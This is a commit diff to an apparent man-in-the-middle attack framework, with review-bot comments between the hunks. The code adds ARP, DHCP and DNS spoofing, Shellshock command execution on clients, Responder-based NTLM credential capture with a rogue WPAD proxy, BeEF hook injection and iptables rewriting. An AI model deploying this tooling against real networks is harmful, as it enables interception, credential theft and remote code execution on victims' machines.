almost done! lots of changes

byt3bl33d3r 2014-12-05 08:21:35 +01:00
commit 787f96d665
12 changed files with 202 additions and 201 deletions


@ -32,7 +32,7 @@ class AirPwn(Plugin):
sys.exit("[-] AirPwn plugin requires --miface argument")
try:
self.aircfg = ConfigObj(self.aircfg)
self.aircfg = ConfigObj("./config/airpwn.cfg")
#Here we compile the regexes for faster performance when injecting packets
for rule in self.aircfg.items():
rule[1]['match'] = re.compile(r'%s' % rule[1]['match'])
@ -135,5 +135,4 @@ class AirPwn(Plugin):
def add_options(self, options):
options.add_argument('--miface', type=str, dest='mon_interface', help='Interface in monitor mode to use')
options.add_argument('--aircfg', type=file, default="./config_files/airpwn.cfg", help="Airpwn config file [default: airpwn.cfg]")
options.add_argument('--dnspwn', type=str, dest='dnspwn', help='Enables the DNSpwn attack and specifies ip')
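Review bot: The new `ConfigObj("./config/airpwn.cfg")` call resolves against the process's working directory, and ConfigObj by default returns an empty config for a missing file instead of raising, so starting the tool from another directory would silently load no rules. Consider anchoring the path to the project directory and passing `file_error=True`, for example `ConfigObj(os.path.join(BASE_DIR, "config", "airpwn.cfg"), file_error=True)`, where `BASE_DIR` is a placeholder for a project-root constant this page does not show. The same hard-coded relative path pattern appears in the App Cache Poison, BeefAutorun, JavaPwn and Spoof sections of this commit. Which lines are old and which are new is inferred from print order and the hunk counts, since the rendering lost its +/- markers.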


@ -1,21 +1,18 @@
from plugins.plugin import Plugin
from sslstrip.ResponseTampererFactory import ResponseTampererFactory
from libs.sslstrip.ResponseTampererFactory import ResponseTampererFactory
#import threading
class AppCachePlugin(Plugin):
name = "App Cache Poison"
optname = "app"
optname = "appoison"
desc = "Performs App Cache Poisoning attacks"
has_opts = True
has_opts = False
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.config_file = options.tampercfg or "./config_files/app_cache_poison.cfg"
self.config_file = "./config/app_cache_poison.cfg"
print "[*] App Cache Poison plugin online"
ResponseTampererFactory.buildTamperer(self.config_file)
def add_options(self, options):
options.add_argument("--tampercfg", type=file, help="Specify a config file")


@ -38,7 +38,7 @@ class BeefAutorun(Inject, Plugin):
else:
sys.exit("[-] Error logging in to BeEF!")
userconfig = ConfigObj(self.autoruncfg)
userconfig = ConfigObj("./config/beefautorun.cfg")
self.Mode = userconfig['mode']
self.All_modules = userconfig["ALL"]
@ -117,10 +117,10 @@ class BeefAutorun(Inject, Plugin):
sleep(0.5)
def add_options(self, options):
options.add_argument('--hookip', dest='hookip', help="Hook IP")
group = options.add_mutually_exclusive_group(required=False)
group.add_argument('--hookip', dest='hookip', help="Hook IP")
group.add_argument('--disable-inject', dest='dis_inject', action='store_true', default=True, help='Disables automatically injecting the hook url')
options.add_argument('--beefip', dest='beefip', default='127.0.0.1', help="IP of BeEF's server [default: localhost]")
options.add_argument('--beefport', dest='beefport', default='3000', help="Port of BeEF's server [default: 3000]")
options.add_argument('--beefuser', dest='beefuser', default='beef', help='Username for beef [default: beef]')
options.add_argument('--beefpass', dest='beefpass', default='beef', help='Password for beef [default: beef]')
options.add_argument('--autoruncfg', type=file, default="./config_files/beefautorun.cfg", help='Specify a config file [default: beefautorun.cfg]')
options.add_argument('--disable-inject', dest='dis_inject', action='store_true', default=True, help='Disables automatically injecting the hook url')
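Review bot: `--disable-inject` is declared with `action='store_true', default=True`, so `dis_inject` is True whether or not the flag is passed and the option cannot change behaviour. The line moved into the mutually exclusive group in `add_options` carries this over unchanged. If injection is meant to stay on unless the flag is given, the declaration should use `default=False`. How `dis_inject` is consumed is outside this section, so confirm the intended polarity before changing it.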


@ -38,7 +38,7 @@ class FilePwn(Plugin):
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.filepwncfg = options.filepwncfg or "./config_files/filepwn.cfg"
self.filepwncfg = options.filepwncfg or "./config/filepwn.cfg"
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload',
'application/x-msdos-program', 'binary/octet-stream']
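Review bot: `initialize` still reads `options.filepwncfg` and only falls back to `./config/filepwn.cfg`, whereas the other plugins touched by this commit drop their per-plugin config option and hard-code the path. If `--filepwncfg` was also removed from `add_options` (not visible in this hunk), this line would raise AttributeError at start-up. If the override is kept on purpose, a short comment such as `# --filepwncfg overrides the bundled default` would make that explicit. The body of `initialize` continues past the hunk.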


@ -35,7 +35,7 @@ class JavaPwn(BrowserProfiler, Plugin):
if not self.msfip:
sys.exit('[-] JavaPwn plugin requires --msfip')
self.javacfg = ConfigObj(self.javapwncfg)
self.javacfg = ConfigObj("./config/javapwn.cfg")
self.javaVersionDic = {}
for key, value in self.javacfg.iteritems():
@ -182,7 +182,6 @@ class JavaPwn(BrowserProfiler, Plugin):
options.add_argument('--msfport', dest='msfport', default='8080', help='Port of MSF web-server [default: 8080]')
options.add_argument('--rpcip', dest='rpcip', default='127.0.0.1', help='IP of MSF MSGRPC server [default: localhost]')
options.add_argument('--rpcpass', dest='rpcpass', default='abc123', help='Password for the MSF MSGRPC server [default: abc123]')
options.add_argument('--javapwncfg', type=file, default="./config_files/javapwn.cfg", help='Specify a config file [default: javapwn.cfg]')
def finish(self):
'''This will be called when shutting down'''


@ -13,6 +13,7 @@ import nfqueue
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import *
from libs.responder.Responder import *
import os
import sys
import threading
@ -39,11 +40,8 @@ class Spoof(Plugin):
self.interface = options.interface
self.arp = options.arp
self.icmp = options.icmp
self.wpad = options.wpad
self.dns = options.dns
self.dnscfg = options.dnscfg
self.dhcp = options.dhcp
self.dhcpcfg = options.dhcpcfg
self.shellshock = options.shellshock
self.cmd = options.cmd
self.gateway = options.gateway
@ -52,10 +50,11 @@ class Spoof(Plugin):
self.arpmode = options.arpmode
self.port = options.listen
self.hsts = options.hsts
self.hstscfg = "./config_files/hsts_bypass.cfg"
self.manualiptables = options.manualiptables #added by alexander.georgiev@daloo.de
self.debug = False
self.send = True
thread_target = None
thread_args = None
if os.geteuid() != 0:
sys.exit("[-] Spoof plugin requires root privileges")
@ -63,13 +62,17 @@ class Spoof(Plugin):
if not self.interface:
sys.exit('[-] Spoof plugin requires --iface argument')
try:
self.ip_address = get_if_addr(options.interface)
if self.ip_address == "0.0.0.0":
sys.exit("[-] Interface %s does not have an IP address" % self.interface)
except Exception, e:
sys.exit("[-] Error retrieving interface IP address: %s" % e)
if self.options.log_level == 'debug':
self.debug = True
print "[*] Spoof plugin online"
if not self.manualiptables:
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
try:
self.mac = get_if_hwaddr(self.interface)
except Exception, e:
@ -107,23 +110,28 @@ class Spoof(Plugin):
self.rand_number = []
self.dhcp_dic = {}
self.dhcpcfg = ConfigObj(self.dhcpcfg)
self.dhcpcfg = ConfigObj("./config/dhcp.cfg")
thread_target = self.dhcp_sniff
thread_args = ()
else:
sys.exit("[-] Spoof plugin requires --arp, --icmp or --dhcp")
elif not options.WPAD_On_Off:
sys.exit("[-] Spoof plugin requires --arp, --icmp, --dhcp or --wpad")
print "[*] Spoof plugin online"
if not self.manualiptables:
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
if (self.dns or self.hsts):
print "[*] DNS Tampering enabled"
if self.dns:
self.dnscfg = ConfigObj(self.dnscfg)
self.dnscfg = ConfigObj("./config/dns.cfg")
self.hstscfg = ConfigObj(self.hstscfg)
self.hstscfg = ConfigObj("./config/hsts_bypass.cfg")
if not self.manualiptables:
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')
self.start_dns_queue()
file = open('/proc/sys/net/ipv4/ip_forward', 'w')
@ -133,13 +141,18 @@ class Spoof(Plugin):
print '[*] Setting up iptables'
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % self.port)
CHarvester = CredHarvester()
t1 = threading.Thread(name='spoof_thread', target=thread_target, args=thread_args)
t2 = threading.Thread(name='cred_harvester', target=CHarvester.start, args=(self.interface))
#CHarvester = CredHarvester()
threads = []
if thread_target:
threads.append(threading.Thread(name='spoof_thread', target=thread_target, args=thread_args))
#t2 = threading.Thread(name='cred_harvester', target=CHarvester.start, args=(self.interface))
for t in [t1, t2]:
t.setDaemon(True)
t.start()
threads.append(threading.Thread(name='responder', target=start_responder, args=(options, self.ip_address)))
if threads:
for t in threads:
t.setDaemon(True)
t.start()
def dhcp_rand_ip(self):
pool = self.dhcpcfg['ip_pool'].split('-')
@ -345,14 +358,22 @@ class Spoof(Plugin):
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Modify intercepted DNS queries')
options.add_argument('--shellshock', dest='shellshock', action='store_true', default=False, help='Trigger the Shellshock vuln when spoofing DHCP')
options.add_argument('--cmd', type=str, dest='cmd', default="echo 'pwned'", help='Command to run on vulnerable clients [default: echo pwned]')
options.add_argument("--dnscfg", type=file, default="./config_files/dns.cfg", help="DNS tampering config file [default: dns.cfg]")
options.add_argument("--dhcpcfg", type=file, default="./config_files/dhcp.cfg", help="DHCP spoofing config file [default: dhcp.cfg]")
options.add_argument('--iface', dest='interface', help='Specify the interface to use')
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]')
options.add_argument('--arpmode', dest='arpmode', default='req', help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]')
#options.add_argument('--summary', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning')
options.add_argument('--manual-iptables', dest='manualiptables', action='store_true', default=False, help='Do not setup iptables or flush them automatically')
#rgroup = options.add_argument_group("Responder", "Options for Responder")
options.add_argument('--analyze', dest="Analyse", action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning anything")
options.add_argument('--basic', dest="Basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
options.add_argument('--wredir', dest="Wredirect", default=False, action="store_true", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' would). Default value is therefore set to False")
options.add_argument('--nbtns', dest="NBTNSDomain", default=False, action="store_true", help="Set this to enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False")
options.add_argument('--fingerprint', dest="Finger", default=False, action="store_true", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query")
options.add_argument('--wpad', dest="WPAD_On_Off", default=False, action="store_true", help = "Set this to start the WPAD rogue proxy server. Default value is False")
options.add_argument('--forcewpadauth', dest="Force_WPAD_Auth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False")
options.add_argument('--lm', dest="LM_On_Off", default=False, action="store_true", help="Set this if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False")
options.add_argument('--verbose', dest="Verbose", action="store_true", help="More verbose")
def finish(self):
self.send = False
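Review bot: The added `from libs.responder.Responder import *` directly after `from scapy.all import *` lets the second star import silently rebind any name both modules export. It also hides where `start_responder`, used in the thread set-up hunk, comes from. Importing explicitly with `from libs.responder.Responder import start_responder` keeps the namespace predictable, assuming that is the only name this file needs from the module. In the same section the commented-out `CredHarvester` lines would be better deleted than left in place.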